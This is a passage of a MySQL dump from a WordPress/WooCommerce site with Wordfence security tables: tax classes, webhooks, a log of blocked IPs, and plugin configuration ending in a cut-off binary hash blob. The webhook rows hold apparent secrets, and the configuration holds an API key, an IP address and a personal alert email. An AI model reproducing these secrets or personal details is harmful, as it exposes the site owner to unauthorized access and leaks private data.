LOCK TABLES `wpxb_wc_tax_rate_classes` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_tax_rate_classes` DISABLE KEYS */;
INSERT INTO `wpxb_wc_tax_rate_classes` VALUES (1,'Reduced rate','reduced-rate'),(2,'Zero rate','zero-rate');
/*!40000 ALTER TABLE `wpxb_wc_tax_rate_classes` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wc_webhooks`
--

DROP TABLE IF EXISTS `wpxb_wc_webhooks`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wc_webhooks` (
  `webhook_id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `status` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `name` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `user_id` bigint(20) unsigned NOT NULL,
  `delivery_url` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `secret` text COLLATE utf8mb4_unicode_ci NOT NULL,
  `topic` varchar(200) COLLATE utf8mb4_unicode_ci NOT NULL,
  `date_created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_created_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `date_modified_gmt` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
  `api_version` smallint(4) NOT NULL,
  `failure_count` smallint(10) NOT NULL DEFAULT 0,
  `pending_delivery` tinyint(1) NOT NULL DEFAULT 0,
  PRIMARY KEY (`webhook_id`),
  KEY `user_id` (`user_id`)
) ENGINE=MyISAM AUTO_INCREMENT=7 DEFAULT CHARSET=utf8mb4 COLLATE=utf8mb4_unicode_ci;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wc_webhooks`
--

LOCK TABLES `wpxb_wc_webhooks` WRITE;
/*!40000 ALTER TABLE `wpxb_wc_webhooks` DISABLE KEYS */;
INSERT INTO `wpxb_wc_webhooks` VALUES (1,'active','b6c5db123d56b78d0cb94dae2fc6331b2a67e295',1,'https://in.app-us1.com/incoming/woocommerce/b6c5db123d56b78d0cb94dae2fc6331b2a67e295','b6c5db123d56b78d0cb94dae2fc6331b2a67e295','order.deleted','2018-05-04 12:13:16','2018-05-04 10:13:16','2019-08-01 17:13:28','2019-08-01 15:13:28',2,0,0),(2,'active','694649423c343b06fea9839477b001e0aadf1b32',1,'https://in.app-us1.com/incoming/woocommerce/694649423c343b06fea9839477b001e0aadf1b32','694649423c343b06fea9839477b001e0aadf1b32','order.updated','2018-05-04 12:13:28','2018-05-04 10:13:28','2019-08-24 15:31:27','2019-08-24 13:31:27',2,0,0),(3,'active','14bc00d902b857b790b89e7647fef8b2c000dea0',1,'https://in.app-us1.com/incoming/woocommerce/14bc00d902b857b790b89e7647fef8b2c000dea0','14bc00d902b857b790b89e7647fef8b2c000dea0','order.created','2018-05-04 12:14:11','2018-05-04 10:14:11','2019-08-24 15:31:27','2019-08-24 13:31:27',2,0,0),(4,'active','e459abb8874419ed8b0accea5a43f0f111a142d5',1,'https://in.app-us1.com/incoming/woocommerce/e459abb8874419ed8b0accea5a43f0f111a142d5','e459abb8874419ed8b0accea5a43f0f111a142d5','customer.deleted','2018-05-04 12:14:18','2018-05-04 10:14:18','0000-00-00 00:00:00','0000-00-00 00:00:00',2,0,1),(5,'active','12f58fd215e638962251822bb94aca290cb3a9fb',1,'https://in.app-us1.com/incoming/woocommerce/12f58fd215e638962251822bb94aca290cb3a9fb','12f58fd215e638962251822bb94aca290cb3a9fb','customer.updated','2018-05-04 12:14:18','2018-05-04 10:14:18','2019-08-24 15:31:27','2019-08-24 13:31:27',2,0,0),(6,'active','dd5b22bc9edbd6c9216ba8cac86d8cb635e589ec',1,'https://in.app-us1.com/incoming/woocommerce/dd5b22bc9edbd6c9216ba8cac86d8cb635e589ec','dd5b22bc9edbd6c9216ba8cac86d8cb635e589ec','customer.created','2018-05-04 12:14:18','2018-05-04 10:14:18','2019-08-06 10:08:28','2019-08-06 08:08:28',2,0,0);
/*!40000 ALTER TABLE `wpxb_wc_webhooks` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfblockediplog`
--

DROP TABLE IF EXISTS `wpxb_wfblockediplog`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfblockediplog` (
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `countryCode` varchar(2) NOT NULL,
  `blockCount` int(10) unsigned NOT NULL DEFAULT 0,
  `unixday` int(10) unsigned NOT NULL,
  `blockType` varchar(50) NOT NULL DEFAULT 'generic',
  PRIMARY KEY (`IP`,`unixday`,`blockType`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfblockediplog`
--

LOCK TABLES `wpxb_wfblockediplog` WRITE;
/*!40000 ALTER TABLE `wpxb_wfblockediplog` DISABLE KEYS */;
INSERT INTO `wpxb_wfblockediplog` VALUES ('\0\0\0\0\0\0\0\0\0\0YN','RU',1,18133,'waf'),('\0\0\0\0\0\0\0\0\0\0(','DE',12,18133,'waf'),('\0\0\0\0\0\0\0\0\0\0_','CA',12,18135,'waf'),('\0\0\0\0\0\0\0\0\0\0Gܲ','SG',5,18134,'waf'),('\0\0\0\0\0\0\0\0\0\0eF','DE',1,18134,'brute'),('\0\0\0\0\0\0\0\0\0\0/','RU',1,18136,'brute'),('\0\0\0\0\0\0\0\0\0\0s','NL',12,18137,'waf'),('\0\0\0\0\0\0\0\0\0\0s','US',61,18105,'brute'),('\0\0\0\0\0\0\0\0\0\03&p','DE',41,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0U','RO',1,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0}','FR',1,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0u','US',61,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0>','NL',61,18105,'brute'),('\0\0\0\0\0\0\0\0\0\05','IR',41,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0<','CN',60,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0;=M','IN',61,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0`@','US',61,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0','RU',61,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0H','US',41,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0j\\','US',41,18105,'brute'),('\0\0\0\0\0\0\0\0\0\0A','SG',61,18106,'brute'),('\0\0\0\0\0\0\0\0\0\0&','IT',60,18106,'brute'),('\0\0\0\0\0\0\0\0\0\0|','SG',41,18106,'brute'),('\0\0\0\0\0\0\0\0\0\0cv','US',41,18106,'brute'),('\0\0\0\0\0\0\0\0\0\0ν&','US',61,18106,'brute'),('\0\0\0\0\0\0\0\0\0\0]Wj','US',61,18107,'brute'),('\0\0\0\0\0\0\0\0\0\05','IR',61,18107,'brute'),('\0\0\0\0\0\0\0\0\0\0\rA','US',61,18107,'brute'),('\0\0\0\0\0\0\0\0\0\0$f','NL',41,18107,'brute'),('\0\0\0\0\0\0\0\0\0\0\\r^','RO',20,18107,'brute'),('\0\0\0\0\0\0\0\0\0\0%r','TR',41,18107,'brute'),('\0\0\0\0\0\0\0\0\0\0;','IN',41,18107,'brute'),('\0\0\0\0\0\0\0\0\0\0;','IN',61,18108,'brute'),('\0\0\0\0\0\0\0\0\0\0ũ','CA',61,18108,'brute'),('\0\0\0\0\0\0\0\0\0\0Dٹ','DE',41,18108,'brute'),('\0\0\0\0\0\0\0\0\0\0	8h','DE',61,18108,'waf'),('\0\0\0\0\0\0\0\0\0\0A','US',41,18108,'brute'),('\0\0\0\0\0\0\0\0\0\0>)','US',61,18108,'brute'),('\0\0\0\0\0\0\0\0\0\0s','US',61,18109,'brute'),('\0\0\0\0\0\0\0\0\0\0%z','GB',74,18109,'waf'),('\0\0\0\0\0\0\0\0\0\0{L','FR',5,18110,'waf'),('\0\0\0\0\0\0\0\0\0\0%5','UA',54,18110,'waf'),('\0\0\0\0\0\0\0\0\0\0F=','CA',5,18111,'waf'),('\0\0\0\0\0\0\0\0\0\0c&','CA',2,18113,'waf'),('\0\0\0\0\0\0\0\0\0\0','US',2,18115,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,18115,'brute'),('\0\0\0\0\0\0\0\0\0\0M','CZ',1,18115,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,18115,'brute'),('\0\0\0\0\0\0\0\0\0\0?','IR',1,18115,'brute'),('\0\0\0\0\0\0\0\0\0\0hxG','US',1,18115,'brute'),('\0\0\0\0\0\0\0\0\0\0D9','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0EY','CA',2,18124,'brute'),('\0\0\0\0\0\0\0\0\0\01','CN',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',2,18124,'brute'),('\0\0\0\0\0\0\0\0\0\035','FR',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0R\0','ES',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0>l+','GB',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0;','IN',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0T','TR',2,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0\"','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','FR',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\06X&','IE',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0#','IN',2,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0B','BE',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0m\Z3','IT',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0oP','CN',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0/jO','CN',2,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0[F','RU',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0s','CA',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0>t;','FR',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0-wS','VN',2,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0c','RU',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0Fl','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0Y1v','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\06\'','CA',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0CZp','RU',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0.r','CZ',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0ϴ#','DE',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0l\n','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0D@','DE',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','DE',2,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0j?','FR',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0\"WA','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\01','CA',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',2,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0w','ID',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0Z$','JP',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0%kK','TR',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','GB',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0Úf','FR',2,18124,'brute'),('\0\0\0\0\0\0\0\0\0\07','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0]','NL',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0g_\r','IN',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0/Y','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0B','FR',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\030','FR',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0=','TH',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0>R#','GB',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','FR',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\08B','HU',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0g8','ID',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\06$5','FR',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0- ','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0Z\'','JP',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0a`','SG',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\0c\"','ID',1,18124,'brute'),('\0\0\0\0\0\0\0\0\0\08B','HU',3,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0k4\\','JP',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\08','NL',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0p','JP',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\01UR','JP',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0>dc','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\01','CN',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0[/','BG',2,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0X','GB',3,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0-M','SG',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0Ѯ/','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0\"];','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0+','JP',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0P','GB',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0m\Z3','IT',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\06\'','CA',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0/KM\"','HK',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0.\\','GB',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0#','MX',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\04','NL',2,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0˸C','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\048','GB',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\01','JP',2,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0U','DE',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0P','JP',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0%;/P','FR',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\05>','TR',2,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0]','NL',3,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0,','DE',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0\"WA','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0]!','AT',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\035','FR',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0h(a','DE',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0G','IN',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0V_','DE',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0-wS','VN',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\07','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0;','SG',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0- r`','SG',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0>t;','FR',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0]qnW','GB',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0Q','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0@','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0hl','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0Җ9','NL',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0dM','CA',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0lM','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0ν+','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0[כ','BG',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0hIp','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0','US',1,18125,'brute'),('\0\0\0\0\0\0\0\0\0\0%','FR',1,18126,'brute'),('\0\0\0\0\0\0\0\0\0\0=','TH',1,18126,'brute'),('\0\0\0\0\0\0\0\0\0\0G','IN',1,18126,'brute'),('\0\0\0\0\0\0\0\0\0\0>t;','FR',1,18126,'brute'),('\0\0\0\0\0\0\0\0\0\0mFd\Z','AT',1,18126,'brute');
/*!40000 ALTER TABLE `wpxb_wfblockediplog` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfblocks7`
--

DROP TABLE IF EXISTS `wpxb_wfblocks7`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfblocks7` (
  `id` bigint(20) unsigned NOT NULL AUTO_INCREMENT,
  `type` int(10) unsigned NOT NULL DEFAULT 0,
  `IP` binary(16) NOT NULL DEFAULT '\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0\0',
  `blockedTime` bigint(20) NOT NULL,
  `reason` varchar(255) NOT NULL,
  `lastAttempt` int(10) unsigned DEFAULT 0,
  `blockedHits` int(10) unsigned DEFAULT 0,
  `expiration` bigint(20) unsigned NOT NULL DEFAULT 0,
  `parameters` text DEFAULT NULL,
  PRIMARY KEY (`id`),
  KEY `type` (`type`),
  KEY `IP` (`IP`),
  KEY `expiration` (`expiration`)
) ENGINE=MyISAM AUTO_INCREMENT=1021 DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfblocks7`
--

LOCK TABLES `wpxb_wfblocks7` WRITE;
/*!40000 ALTER TABLE `wpxb_wfblocks7` DISABLE KEYS */;
/*!40000 ALTER TABLE `wpxb_wfblocks7` ENABLE KEYS */;
UNLOCK TABLES;

--
-- Table structure for table `wpxb_wfconfig`
--

DROP TABLE IF EXISTS `wpxb_wfconfig`;
/*!40101 SET @saved_cs_client     = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `wpxb_wfconfig` (
  `name` varchar(100) NOT NULL,
  `val` longblob DEFAULT NULL,
  `autoload` enum('no','yes') NOT NULL DEFAULT 'yes',
  PRIMARY KEY (`name`)
) ENGINE=MyISAM DEFAULT CHARSET=utf8;
/*!40101 SET character_set_client = @saved_cs_client */;

--
-- Dumping data for table `wpxb_wfconfig`
--

LOCK TABLES `wpxb_wfconfig` WRITE;
/*!40000 ALTER TABLE `wpxb_wfconfig` DISABLE KEYS */;
INSERT INTO `wpxb_wfconfig` VALUES ('activatingIP','156.0.220.56','yes'),('actUpdateInterval','2','yes'),('addCacheComment','0','yes'),('adminNoticeQueue','a:0:{}','yes'),('adminUserList','a:3:{i:1;i:1;i:3;i:1;i:4;i:1;}','yes'),('advancedCommentScanning','1','yes'),('ajaxWatcherDisabled_admin','0','yes'),('ajaxWatcherDisabled_front','0','yes'),('alertEmails','nazeer@digitalstrategies.biz','yes'),('alertOn_adminLogin','1','yes'),('alertOn_block','1','yes'),('alertOn_breachLogin','1','yes'),('alertOn_firstAdminLoginOnly','0','yes'),('alertOn_firstNonAdminLoginOnly','0','yes'),('alertOn_loginLockout','1','yes'),('alertOn_lostPasswdForm','1','yes'),('alertOn_nonAdminLogin','0','yes'),('alertOn_scanIssues','1','yes'),('alertOn_severityLevel','25','yes'),('alertOn_throttle','0','yes'),('alertOn_update','0','yes'),('alertOn_wafDeactivated','1','yes'),('alertOn_wordfenceDeactivated','1','yes'),('alert_maxHourly','0','yes'),('allowed404s','/favicon.ico\n/apple-touch-icon*.png\n/*@2x.png\n/browserconfig.xml','yes'),('allowed404s6116Migration','1','yes'),('allowHTTPSCaching','0','yes'),('allowLegacy2FA','0','yes'),('allowMySQLi','1','yes'),('allScansScheduled','a:3:{i:0;a:2:{s:9:\"timestamp\";i:1567066200;s:4:\"args\";a:1:{i:0;i:1567066200;}}i:1;a:2:{s:9:\"timestamp\";i:1567325400;s:4:\"args\";a:1:{i:0;i:1567325400;}}i:2;a:2:{s:9:\"timestamp\";i:1567584600;s:4:\"args\";a:1:{i:0;i:1567584600;}}}','yes'),('apiKey','a49de41e5d49501799f6a768b2705e5f15305d8bfdd1a1881c7193a273bdcc018683db385889f734f5846edf8cf644c6cb899dc24c9ed0c2fdd5156583b0fdb2ba9487e479b92a8bb7b0d23429ed5f30','yes'),('autoBlockScanners','1','yes'),('autoUpdate','0','yes'),('autoUpdateAttempts','0','yes'),('autoUpdateChoice','1','yes'),('bannedURLs','','yes'),('betaThreatDefenseFeed','0','yes'),('blockCustomText','','yes'),('blockedTime','300','yes'),('blockFakeBots','0','yes'),('blocks702Migration','1','yes'),('cacheType','disabled','yes'),('cbl_action','block','yes'),('cbl_bypassRedirDest','','yes'),('cbl_bypassRedirURL','','yes'),('cbl_bypassViewURL','','yes'),('cbl_cookieVal','5ca5aa4d5de26','yes'),('cbl_loggedInBlocked','','yes'),('cbl_redirURL','','yes'),('cbl_restOfSiteBlocked','1','yes'),('checkSpamIP','1','yes'),('config701Migration','1','yes'),('config720Migration','1','yes'),('coreHashes','\0\0\0\0\0\0\0a:2:{s:4:\"hash\";s:64:\"d653d0c99ac9ae43cabe9cd324f627cae0deb128f49fea56102b17a89cc20626\";s:6:\"hashes\";s:125536:\"\0W7ht#	q)d$\0\0(ZYY@Iqȗ#T@\04ߗt\\vQ޹\'_ajxҦ\0E=jȋ|p8.½֤SGp\0EqxPa>bvDo4VG;a<\0^N弘ae|K-ܰɜ=\0b&F%|w*Qr;|/=(A<\0#B5j$#j!bNj\0ۧ4(KI|0qD.^v\0>|;(߯\\W*7?\nN2=7[Uo\0iք\"]^XD2](\0/o):4]_+̔c\0e*@t\"q	ȐN5H\0T|̅_S8O0μ¸06\0-bsG\n(hr\Z.n!ez.YxUi5G$PuvATʦDIXVfEWeG]q)6	jnNؤ^}0[PKXs+ȉawS[U`|WSPD羟Nhb!#8i>kq6RE5:\"ϱT_^gyzGL\"1U}6:l|(㜦q{V~u<Dho*cϬ0xcl$	4mo`vA:`{rf_S3/sm?d^͔0X0#q-ml*#TcxEyũH>$2]%*6\\dpۛ!s%]ZYoݿr;G\"Gu&w]-H\rRW\\5\'=Q7ai\rICpEKykѩ}ˣ\\$p\"&p+^\Z{5|f㵅SLo3ExѥUq`q4uZ[n8Or70H01YL$RRAhJ6Mw:/7.ڏPh.BU-ї\'Tsz+pM˻yULKCWa\\ˁ\n;0Ġ\"fАΟ\'\r͍DdMsǿڴ$2j),\n\' #69\nږmK2efte4\ZGG.fVy`)\".o[`ϐ\rnjnviU\n@,+!%u	re4+JuP$,WNP2\"Ş,|^y޲/\Z(A1]/ƅBMj:@ѫG+SfdVi\n6Wԑ\\<OEj2Q\r|X6/46J?XGX~uic\rpQ활\r?cLTӊqgȫ?crȸtdB\rTJ,Q$TDh((ZdzvO_;ƀEpY.&}_	QoSnn̵v\0)Ӥ:DILV\0yZ)K\nܘD~%Roc7\rL>1݈]^]RɢNFMJ,iI.2 >1Z;ר1ԁ$!W:	SxDq5/w_W:+f1zg\\YmxGO0jo].㖽B=f~:NFa6ա\nY \'i+`fGYbmUPMJڡ0&CvM$O4-K	o6lb1E;7x?-ǱZzE*nkEm@1sY#1$\Z=IbXBr?ͥ-!i>`]wBκ@kp&h4ԛ2f\'GIS}}R⥅JЛZ[`mI$=D֛&Ǿ@+բz=i S\Z\Z4ڶ1523\r#?EQLIm$ZB\Z!&͖Ck`7\'/]i5\0%%-)^\\\0t`k@UOŔcp>!8HB6=b!nz\0OS~K|$TlJbOwf\nTEg\ZU\rl{SYD7I.`Ï}#٧JKNeӌ&ЎuѡIqtn~T	_j-%?70i}eiZO&E+rXe{emX<:KSz_oeŭy^/?h;@rK%LPfc(|_]U͒o~MEs@Z2]i](J~n3ϝـhjqo2kLJQc\08|VANں)\rmMADos,$gJ	Ŗ7l}aw|gRLh!1R&\'kD\':8Yߤ\'\\\0|8(]xZvJ+~S$ً6vgAќʋQ?j`J2r)rk+`NiM2]<	h\n˥O35F\\\0,vS+p\n.\rJ*RT	!A&UBtG=_:\\]>i?η@ڹaKպ*Խ+]ҮgƉ^62G\rS|;)$=Xn!l=@A:V56Ux5Px&:VV-qXA9M4-t\n{}MI	AE0N.T0b([oYd% +[B f<3)|xZq@51aIxMOYU\rZtKϭuJOyŹ&Ҹ*ܲus#t1#4䂹\Z\'&8\0m9;:ͼff)I;Poi=DᎯ0Slhsgܺ{,`h`P*ͤ!j1m!~J\rO]Y<y}\Z>ɺHI|PBbe^Έ;VT1cj] k^O9A9/\Z%@b.` podf?jrYe|Hh>,ecRes5-D=<:3ϩM>r6Ԥ%zuۇ7}F[yx]kݭYr9IV,C2\"Vlp]l2Pf>Kp֚Jbvw`*w}*ʘ)>2qe^)PnGfR@Ol,>iv:`tQ*8\'<\nJ;H`Q؝6pqa%\r	\"An3HIs:Yae0BҲyPp\nﭾ!Λ&Ʌ\'M4BS+\'4&$ءVggog~m//&t+s\"#:Zܯ4㓉&_&6\"xF|w`AZ_+vL\r}NP6_Ұݾl2bqÜ$Uv	l,s\"\rm`YדUX^Ms6RH@	&冾Bx@dR#UOPgsHo)nWrtZM?%VDFv@*9Vμ[EBu}<\Z#d4*?dQ]Bx.|9D:h@Q/U\0-|_ۢ1g-+}Ԙ!^iBJ\\W]f@@w=	.]kZ1љmG]x0	14\"1IxGL[	>(GA:	64 2DMM$\r澐i\0	8\\ŬjAʔ5+XoTm_|	Myu$1ck_Kofm%	g)[.r\noi{4Q\n\r8H\rfX	vlٮ!Pm\n6|ϔK	~Cȫ7:s&ujt	+{Rلnt,Ǟ`|U		#t̹p=I\")F	֓-\nqUi-$h*ml	VhLC»>U8.`@<Kh	ͿU%OHޡ@~x\\6~\n*<ӳ?HM\'VL\'[R\n@&[DqSBN#FB\n*An.]Btv!WҧMw9F\n+P_tQVo7n\nz#8J\nGk~ngm.3\\\n1ijgָ\nv?u	fh62B?2\03}\nxmnV=OD\0T)U\n\\_9()7\n/S\'g߃v\n9dg~@|B-ڐ6=\nT[Cp(,_V+L\rۨI(.\nsHчc -y//?\r$M̤j3\naqYKJҔ΀p\ZJj\\P\n\nڷtn\rEanJ;}(ҙ.9\nX:Q}+O\\_	{ܓC\'ay:\n W\"w\05S Nrh\nC0pFdl\0\"u~2\"Tp\Z\nv[\0XZppi.c;~&\n&)h4_`FL<:`#pf\nRW#ވ Qē4E[\'z61kK(]1zukpR!YC8`dfh.^8!{FNL{z),\"wWSJǲKSuᾒMcccdD(Q\\\ra[J?T?Gd(stBUI+uCRSF2>3`v\':js(-N֠N3:VS;CT\n]CrJ2m5CZ\0/@@11S.>UB|2ӜOU}(԰tc2ĒZVR顃[l#4>1εEl|lh]:Yň3	\\gm̻1)q+#b^0rR_ҲYn,J́TNB(-g\\ICڞ:rn̿>TwD\nQ!@iDrȭ!wzL{Jy7-mG鴞Y[kEn#XviwR:M7KkRD. L9%SJ*n\'ͪt^VɹO*(7Y(Vz|%\0\'jlص$hTC՞N8kȺym-BYVAlͼ2VS#nX6XDUT=1O@,x )\r&d5s/,\"d\r%PcW-:\'2U\'Ftݩz\r1?;IB=S\Z2֥͐&׆ZB\rQi^\ZB|fC-/rUY٢B\rX[cdpSs3%.X|Aw#(JL\ra{p9(A)ˡ̮SPVs6#i\rnu:Ft\Z\"P9qPRPA\rk<vWPvg(Hтc+d7\rYtW^}rIxۯu$/dMk\rU:w,&Kp&\Z\r7GٛrXylﳠ<U5p8n\rXd	D\nqbc\Zu\rٓC7,<p,L~rYs#\r\"(qq6ZNş&h\r\n*J6V^%W\\y\'h?II3z(BGQ#`pS:eJ&/ʝaɋ`\n}\Z\\x+G\\%RO6}㕓悫-FkRV6G_e\r\"}Q^uYtYsNldU|7tUFYnaIWRHjwHBBuXp\0bUe$OrΰYeJXpW	!L	oѦ?11]Q[7*a3Ǿh,Uc\\ki6uJ\n3*KviA&4=Dq!蓸֧f;4PZeO!vx.e8jY0\ZPP1S/0?U!͝6??Zvw=2H:)x.o\\JtLUoL~)6K5S$ʂ8⡧5gg73lsuؾyZwڠ0YE\0身i\\|7wq;,rLX\\35qv.R߼h<<thD$\\FM(b;ˏKg&\n-nzEja #[՝YdIdf@\\K2o؂/*~Hwc@2,P0x`ՁdZvs.k\Z5\0yX$j뤋I8@t={9v>:̷M\Zϵ\rBt\r3tC Y\nH$$T̞}^pfO]ǭN3%\r\\-AJKK7Pxe\'PHHP=,LN}\ZEO\\0uFOR\Z)ā;S\'bN<vwLSڻsT|>Qi}GD7OF5BNov:A_-3x\ZJB@ky50\nQ(;4.`Rw|lSPpkGM8ԹfEx;˝O[J`uOv&_-]E;|x$(t`\"/\Z=`>&oR֫	ڲ}Z	